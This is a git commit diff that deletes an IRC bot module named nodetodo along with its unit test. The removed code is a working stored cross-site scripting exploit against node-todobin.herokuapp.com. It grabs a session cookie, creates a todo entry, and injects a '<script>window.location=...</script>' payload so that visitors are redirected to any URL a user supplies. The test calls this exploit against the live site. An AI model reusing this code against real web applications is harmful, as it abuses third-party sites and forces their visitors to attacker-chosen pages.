remove broken nodetodo module
parent
402137d379
commit
f8e2afbb9d
|
@ -1,69 +0,0 @@
|
||||||
#!/usr/bin/python3
|
|
||||||
"""
|
|
||||||
nodetodo.py - node-todo uploader
|
|
||||||
author: mutantmonkey <mutantmonkey@mutantmonkey.in>
|
|
||||||
author: telnoratti <calvin@winkowski.me>
|
|
||||||
"""
|
|
||||||
|
|
||||||
from urllib.error import HTTPError
|
|
||||||
from urllib import request
|
|
||||||
from tools import GrumbleError
|
|
||||||
import web
|
|
||||||
import json
|
|
||||||
|
|
||||||
def xss(phenny, input):
|
|
||||||
""".xss <url> - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
|
|
||||||
|
|
||||||
url = input.group(2)
|
|
||||||
if not url:
|
|
||||||
phenny.reply("No URL provided.")
|
|
||||||
return
|
|
||||||
|
|
||||||
if not url.startswith('http'):
|
|
||||||
url = ''.join(['http://', url])
|
|
||||||
|
|
||||||
try:
|
|
||||||
url = urlshortener(url)
|
|
||||||
except (HTTPError, IOError):
|
|
||||||
raise GrumbleError("THE INTERNET IS FUCKING BROKEN. Please try again later.")
|
|
||||||
|
|
||||||
phenny.reply(url)
|
|
||||||
xss.rule = (['xss'], r'(.*)')
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def urlshortener(longurl):
|
|
||||||
xss = ''.join(["""{"status":false,"text":"<script>window.location='""", longurl, """'</script>"}"""])
|
|
||||||
xss = xss.encode()
|
|
||||||
r = request.urlopen('http://node-todobin.herokuapp.com/list')
|
|
||||||
cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
|
|
||||||
|
|
||||||
r = request.Request('http://node-todobin.herokuapp.com/api/todos',
|
|
||||||
headers={
|
|
||||||
'Content-Type': 'application/json',
|
|
||||||
'Accept': 'application/json, text/javascript, */*',
|
|
||||||
'Cookie': cookie,
|
|
||||||
}, data=b'{"id":null}')
|
|
||||||
opener = request.build_opener(request.HTTPHandler)
|
|
||||||
response = opener.open(r)
|
|
||||||
data = response.read()
|
|
||||||
js = json.loads(data.decode('utf-8'))
|
|
||||||
uri = js.get('uri')
|
|
||||||
url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
|
|
||||||
newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
|
|
||||||
|
|
||||||
request.urlopen(url)
|
|
||||||
request.urlopen(newurl)
|
|
||||||
r = request.Request(url,
|
|
||||||
headers={
|
|
||||||
'Content-Type': 'application/json',
|
|
||||||
'Accept': 'application/json, text/javascript, */*',
|
|
||||||
'Cookie': cookie,
|
|
||||||
}, data=xss)
|
|
||||||
|
|
||||||
opener.open(r)
|
|
||||||
|
|
||||||
return newurl
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
print(__doc__.strip())
|
|
|
@ -1,23 +0,0 @@
|
||||||
"""
|
|
||||||
test_nodetodo.py - tests for the node-todo xss module
|
|
||||||
author: mutantmonkey <mutantmonkey@mutantmonkey.in>
|
|
||||||
"""
|
|
||||||
|
|
||||||
import re
|
|
||||||
import unittest
|
|
||||||
from mock import MagicMock, Mock
|
|
||||||
from modules.nodetodo import xss, urlshortener
|
|
||||||
|
|
||||||
|
|
||||||
class TestNodeTodo(unittest.TestCase):
|
|
||||||
def setUp(self):
|
|
||||||
self.phenny = MagicMock()
|
|
||||||
|
|
||||||
def test_xss(self):
|
|
||||||
input = Mock(group=lambda x: 'http://vtluug.org/')
|
|
||||||
xss(self.phenny, input)
|
|
||||||
|
|
||||||
out = self.phenny.reply.call_args[0][0]
|
|
||||||
m = re.match('^http://node-todobin\.herokuapp\.com/list/[a-z0-9]+$',
|
|
||||||
out, flags=re.UNICODE)
|
|
||||||
self.assertTrue(m)
|
|